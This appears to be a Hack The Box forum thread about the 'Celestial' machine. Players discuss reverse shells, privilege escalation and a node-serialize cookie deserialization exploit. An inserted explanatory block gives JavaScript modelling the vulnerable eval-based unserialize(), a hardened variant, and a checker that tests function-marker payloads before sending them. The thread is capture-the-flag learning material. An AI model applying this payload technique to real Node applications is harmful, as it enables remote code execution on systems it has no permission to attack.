Celestial hint

@xtech said:
The exploits that you have to use for user are interesting, but priv esc is not implemented well at all: you edit the file and you have to wait. Once the time is already there, some other idiot edits the file with wrong input, and then you have to get into an editing war with other people. Also, let's not forget that the machine crashes for 20 min every 10 min, ANDDDD when the machine crashes, which means every 10 min, you have to re-exploit the user. Pretty bad implementation. At least give SSH. (DON'T REPLY WITH "GET VIP MEMBERSHIP" cuz other free boxes are smoothly implemented with much harder exploitation.) PEACE

Waiting 5 minutes wouldn’t be so bad if the box could stay up for more than 5 minutes at a time…

There are some reverse shells for this platform that should not crash the server - according to a comment in the code. As far as I can tell from my tests this is not true (unless every time I tested with such shells somebody crashed the server with their hack).

Otherwise, it’s a really interesting box. I also agree with @3ndG4me that you don’t need THAT ARTICLE. Seems I did not find it initially, but used only more general advice on vulnerabilities in code in this language - which evil function not to use as a developer :wink: I learned a lot from building up my own exploit code, testing snippets in the browser console locally etc. You can trigger different server-side messages, and one will confirm that you are on the right track as it mentions the evil function :wink:

I also tried different variations of the reverse shell code in that language - it seems with some shells you get an initial connection but then they aren’t stable … which can be hard to troubleshoot because of the frequent resets. I finally found THAT ARTICLE but only used the part of another linked article that creates the reverse shell - that shell seemed more stable than the others. I would be interested in discussing details over PM - which reverse shell code you used and what detail of the code really makes the shell stable … I think it is related to handling errors and disconnects …

Got root, but I think that I missed a few things. Can somebody DM me to discuss, please?

Hi, could someone PM me how to advance (trying to get user access)? I can’t find “the article” everyone is referring to. Thanks!

@BobBobbington said:
Hi, could someone PM me how to advance (trying to get user access)? I can’t find “the article” everyone is referring to. Thanks!

I’ll PM you.

@s2233 said:
Waiting 5 minutes wouldn’t be so bad if the box could stay up for more than 5 minutes at a time…

Yeah, wait 5 min, but what about when someone changes your script to a reverse shell in those minutes, deleting your script and crashing the server :-1:

As I’d been asked per PM - I rooted it, but I would be interested in discussing details of others’ reverse shell code over PM. I wrote my own script for piecing together the exploit, and I tested snippets of code for creating a reverse shell. I’d like to understand why and if some shells are more stable than others - even if they all use the same core code that actually makes the connection …

Should possibly correct that spoilery wording…

@kekra said:
As I’d been asked per PM - I rooted it, but I would be interested in discussing details of others’ reverse shell code over PM.

I am really most interested in learning what features would generally make a reverse shell stable (in whatever programming language) in an unreliable environment such as this box … Scrolling back in this thread shows that others also said the same code was working for them one day, and not the next.

What I should also add: I became a VIP member yesterday, so when I finally rooted it - using a seemingly good version of the code - I was working on a more stable machine.

SyntaxError: Unexpected token

   at Object.parse (native)
   at Object.exports.unserialize (/home/sun/node_modules/node-serialize/lib/serialize.js:62:16)
   at /home/sun/server.

Whenever I try to get the reverse shell I get this. Why is that? Can someone please tell me?
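A note on reading that trace, with an added example that is not code from the thread or from the node-serialize library: the innermost frame is `Object.parse` called from `unserialize`, which means the cookie failed `JSON.parse` before any deserialization logic ran. In other words the payload string itself is not valid JSON (typically because a double quote inside the embedded function body was not escaped), so no function was ever evaluated. The block below is a simplified, constructed model of a node-serialize-style `unserialize()` (the `_$$ND_FUNC$$_` marker and the parse-then-eval order are the behaviour being illustrated, not the library's actual source), a hardened variant that refuses function markers, and a `classifyPayload()` check that tells you which stage a payload would fail at before you send it. All payload strings are constructed for the example.

```javascript
// Added example for this thread: a minimal MODEL of how a node-serialize-style
// unserialize() processes input. This is not the library's code; the marker
// string and the JSON.parse-before-eval ordering are the points being shown.
const FUNC_MARKER = '_$$ND_FUNC$$_';

// Vulnerable model: parse JSON first, then eval any string carrying the marker.
// A malformed cookie throws SyntaxError at JSON.parse and never reaches eval,
// which is exactly the "Object.parse ... unserialize" trace shape.
function unserializeVulnerable(serialized) {
  const obj = JSON.parse(serialized);
  for (const key of Object.keys(obj)) {
    const v = obj[key];
    if (typeof v === 'string' && v.startsWith(FUNC_MARKER)) {
      // Wrapping in parentheses makes "function(){...}()" an expression,
      // so an immediately-invoked function runs during deserialization.
      obj[key] = eval('(' + v.slice(FUNC_MARKER.length) + ')');
    }
  }
  return obj;
}

// Hardened model: treat the input as plain data and reject any function marker.
// A real fix would avoid function-reviving deserializers altogether.
function unserializeSafe(serialized) {
  const obj = JSON.parse(serialized);
  for (const key of Object.keys(obj)) {
    const v = obj[key];
    if (typeof v === 'string' && v.includes(FUNC_MARKER)) {
      throw new Error('function markers are not accepted in serialized input');
    }
  }
  return obj;
}

// Pre-flight check for a payload: does it die at the JSON stage, at the eval
// stage, or does it actually run? Use this locally before sending a cookie.
function classifyPayload(serialized) {
  try {
    const value = unserializeVulnerable(serialized);
    return { stage: 'executed', value };
  } catch (e) {
    if (e instanceof SyntaxError) return { stage: 'json', error: e.name };
    return { stage: 'eval', error: e.name };
  }
}

// Constructed payloads: one valid (single quotes inside the function body),
// one with unescaped double quotes that breaks the JSON before eval is reached.
const GOOD_PAYLOAD = JSON.stringify({
  username: "_$$ND_FUNC$$_function(){ return 'ran' }()",
});
const BROKEN_JSON_PAYLOAD =
  '{"username":"_$$ND_FUNC$$_function(){ return "x" }()"}';

console.log(classifyPayload(GOOD_PAYLOAD).stage);        // executed
console.log(classifyPayload(BROKEN_JSON_PAYLOAD).stage); // json
```

Run it with `node`: the first payload reaches eval and sets `username` to `'ran'`; the second fails at `JSON.parse` with the same `SyntaxError: Unexpected token` seen in the trace, without ever touching the function body. Validating the cookie with `JSON.parse` locally (after any encoding layer the application uses is stripped) is the quickest way to separate "my payload is malformed" from "the server rejected or crashed on my payload".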

Just pwned this - If anybody needs some hints DM me

;-; whyz you needz hintz

Whenever I am running the exploit I am getting:
An error occurred…invalid username type

Why is that? Can you help me?

Nvm, got it.

@stevv said:
Whenever I am running the exploit I am getting:
An error occurred…invalid username type

Why is that? Can you help me?

Feel free to PM me - I’ll try to help debug it with you

Hi everyone,
I’m trying to get the user’s flag by injecting system commands via the cookie, but without success.
I get this page:
“Hey Dummy undefined + undefined is NaN”
I think it’s a syntax error but I’m not sure.
Can anyone PM me to debug this with me please ?

@stevv said:
Whenever I am running the exploit I am getting:
An error occurred…invalid username type

Why is that? Can you help me?

Nvm, got it.

I am stuck on that bit, could you PM me what you changed? I think I’m missing something obvious

Can someone help me with the last step of priv escalation? I’m not getting the s**** back, but when I run it manually it gets a connection back.

Hi all, I’m sending the exploit correctly, however I don’t seem to be getting a response, any tips, PM me?

If somebody needs any help, PM me.

@xtech said:

@s2233 said:
Waiting 5 minutes wouldn’t be so bad if the box could stay up for more than 5 minutes at a time…

Yeah, wait 5 min, but what about when someone changes your script to a reverse shell in those minutes, deleting your script and crashing the server :-1:

Hey @xtech I 100% agree with you. That is something I personally had not considered when designing the priv esc. It definitely makes things trickier in the free HTB environments. I can’t undo the damage in this case unfortunately, but I definitely have a solution to prevent a poor design choice like this should I use a similar technique for a challenge in the future.

I really appreciate you speaking up about that issue, it forced me to really think about the design of machines for HTB, and come up with a better way to implement something like that later on.

@s2233 said:

Hey @xtech I 100% agree with you. That is something I personally had not considered when designing the priv esc. It definitely makes things trickier in the free HTB environments. I can’t undo the damage in this case unfortunately, but I definitely have a solution to prevent a poor design choice like this should I use a similar technique for a challenge in the future.

I really appreciate you speaking up about that issue, it forced me to really think about the design of machines for HTB, and come up with a better way to implement something like that later on.

Yeah, I knew the solution to get root but waited until the next day to execute it because of that guy who kept changing my script. However, the user exploit was good. Anyway, thanks for your contribution :slight_smile: